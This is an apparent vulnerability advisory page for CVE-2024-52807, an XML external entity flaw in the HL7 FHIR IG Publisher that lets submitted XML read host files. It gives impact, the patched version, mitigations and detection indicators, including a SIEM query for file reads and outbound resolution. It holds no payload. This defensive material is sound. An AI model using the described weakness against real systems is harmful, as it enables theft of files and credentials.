CVE-2024-52807
📋 TL;DR
This CVE describes an XML External Entity (XXE) vulnerability in the HL7 FHIR IG Publisher tool versions before 1.7.4. Attackers can exploit this by submitting malicious XML files containing external entity references, potentially allowing them to read sensitive files from the host system. Organizations using this tool in environments where external clients can submit XML are affected.
💻 Affected Systems
- HL7 FHIR IG Publisher
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the host system through file disclosure, potentially leading to credential theft, configuration exposure, and lateral movement within the network.
Likely Case
Unauthorized reading of sensitive files from the host system, potentially exposing configuration files, credentials, or other sensitive data.
If Mitigated
Limited impact with proper input validation and network segmentation, potentially only affecting isolated processing environments.
🎯 Exploit Status
Exploitation requires ability to submit XML files to the tool. The advisory mentions a previous incomplete fix, suggesting the vulnerability may be more complex than typical XXE.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.7.4
Vendor Advisory: https://github.com/HL7/fhir-ig-publisher/security/advisories/GHSA-8c3x-hq82-gjcm
Restart Required: No
Instructions:
1. Download version 1.7.4 or later from the official repository. 2. Replace existing installation with the updated version. 3. Verify that all XSLT processing now properly disables external entity resolution.
🔧 Temporary Workarounds
No workarounds available
allThe vendor advisory states no known workarounds exist. Previous attempts to fix this were incomplete.
🧯 If You Can't Patch
- Isolate the FHIR IG Publisher tool from untrusted networks and restrict XML submission to trusted sources only.
- Implement strict input validation and sanitization for all XML files before they reach the vulnerable XSLT processing components.
🔍 How to Verify
Check if Vulnerable:
Check the installed version of org.hl7.fhir.publisher. If version is below 1.7.4 and the tool accepts XML from external sources, it is vulnerable.Check Version:
Check the publisher version in the tool's output or configuration files, or run: java -jar fhir-publisher.jar --versionVerify Fix Applied:
After upgrading to 1.7.4, test with a benign external entity reference in XML to confirm it is no longer processed.📡 Detection & Monitoring
Log Indicators:
- Unusual file access patterns from the publisher process
- Failed attempts to resolve external entities in XML processing logs
- Large XML files with DTD declarations being processed
Network Indicators:
- External entity resolution attempts (HTTP/HTTPS requests to internal resources)
- Unusual outbound connections from the publisher tool
SIEM Query:
process_name:"java" AND process_args:"fhir-publisher" AND (event_type:"file_read" OR network_destination_ip:internal_range)